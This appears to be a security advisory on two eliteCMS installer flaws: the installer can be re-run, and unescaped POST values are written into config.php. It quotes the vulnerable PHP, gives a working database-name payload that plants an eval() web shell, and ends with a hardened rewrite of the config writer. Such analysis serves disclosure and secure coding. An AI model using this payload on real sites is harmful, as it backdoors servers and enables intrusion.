eliteCMS does not lock its installer once installation has finished, so an attacker can open the installer URL again and re-run the installation.

A second vulnerability is that the installer can write a one-line backdoor straight into admin/includes/config.php.
Let's look at the code:
...
elseif ($_GET['step'] == "4") {
    $file = "../admin/includes/config.php";
    $write = "<?php\n";
    $write .= "/**\n";
    $write .= "*\n";
    $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
    ...omitted...
    $write .= "*\n";
    $write .= "*/\n";
    $write .= "\n";
    $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";
    $write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
    $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";
    $write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";
    $write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";
    $write .= "if (!\$connection) {\n";
    $write .= "    die(\"Database connection failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
    $write .= "if (!\$db_select) {\n";
    $write .= "    die(\"Database select failed\" .mysql_error());\n";
    $write .= "    \n";
    $write .= "} \n";
    $write .= "?>\n";

    $writer = fopen($file, 'w');
    ...
Now look at where those session values come from:
$_SESSION['DB_SERVER'] = $_POST['DB_SERVER'];
$_SESSION['DB_NAME'] = $_POST['DB_NAME'];
$_SESSION['DB_USER'] = $_POST['DB_USER'];
$_SESSION['DB_PASS'] = $_POST['DB_PASS'];
None of these values is validated. Because each one is interpolated unescaped into the generated PHP source, submitting the following as the database name in the POST data:

"?><?php eval($_POST[c]);?><?php

causes a one-line backdoor to be written into /admin/includes/config.php.
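As an added example (not eliteCMS code), here is how the step-4 config writer could be hardened: refuse to run once an install lock exists, validate the database name against a conservative character set, and emit every value with var_export() so it lands inside a quoted PHP literal rather than being interpolated raw into the file. The file name install.lock and the function names are assumptions.

```php
<?php
// Added example (not eliteCMS code): hardened replacement for the step-4
// config writer. install.lock and the function names are assumed.

// 1. Lock: once installation has finished a lock file is created and any
//    later request to the installer is refused.
function installLocked(string $lockFile): bool {
    return file_exists($lockFile);
}

// 2. Validate: identifiers never need quoting tricks, so reject anything
//    outside a conservative character set instead of trying to escape it.
function validateDbName(string $name): string {
    if (!preg_match('/^[A-Za-z0-9_]{1,64}$/', $name)) {
        throw new InvalidArgumentException('invalid database name');
    }
    return $name;
}

// 3. Serialize: var_export() writes a properly quoted PHP string literal,
//    so a value like  ?><?php eval($_POST[c]);?><?php  becomes data, not code.
function buildConfig(array $db): string {
    $out = "<?php\n";
    foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $key) {
        $out .= 'define(' . var_export($key, true) . ', '
              . var_export((string)$db[$key], true) . ");\n";
    }
    return $out;
}

function writeConfig(string $file, string $lockFile, array $post): void {
    if (installLocked($lockFile)) {
        http_response_code(403);
        exit('installer is locked');
    }
    $db = [
        'DB_SERVER' => (string)($post['DB_SERVER'] ?? ''),
        'DB_NAME'   => validateDbName((string)($post['DB_NAME'] ?? '')),
        'DB_USER'   => (string)($post['DB_USER'] ?? ''),
        'DB_PASS'   => (string)($post['DB_PASS'] ?? ''),
    ];
    // Write atomically with restrictive permissions, then drop the lock.
    $tmp = $file . '.tmp';
    file_put_contents($tmp, buildConfig($db), LOCK_EX);
    chmod($tmp, 0640);
    rename($tmp, $file);
    file_put_contents($lockFile, date('c'));
}
```

Feeding the page's malicious database name through buildConfig() alone yields `define('DB_NAME', '?><?php eval($_POST[c]);?><?php');`, a plain string constant, and validateDbName() rejects it outright before it gets that far.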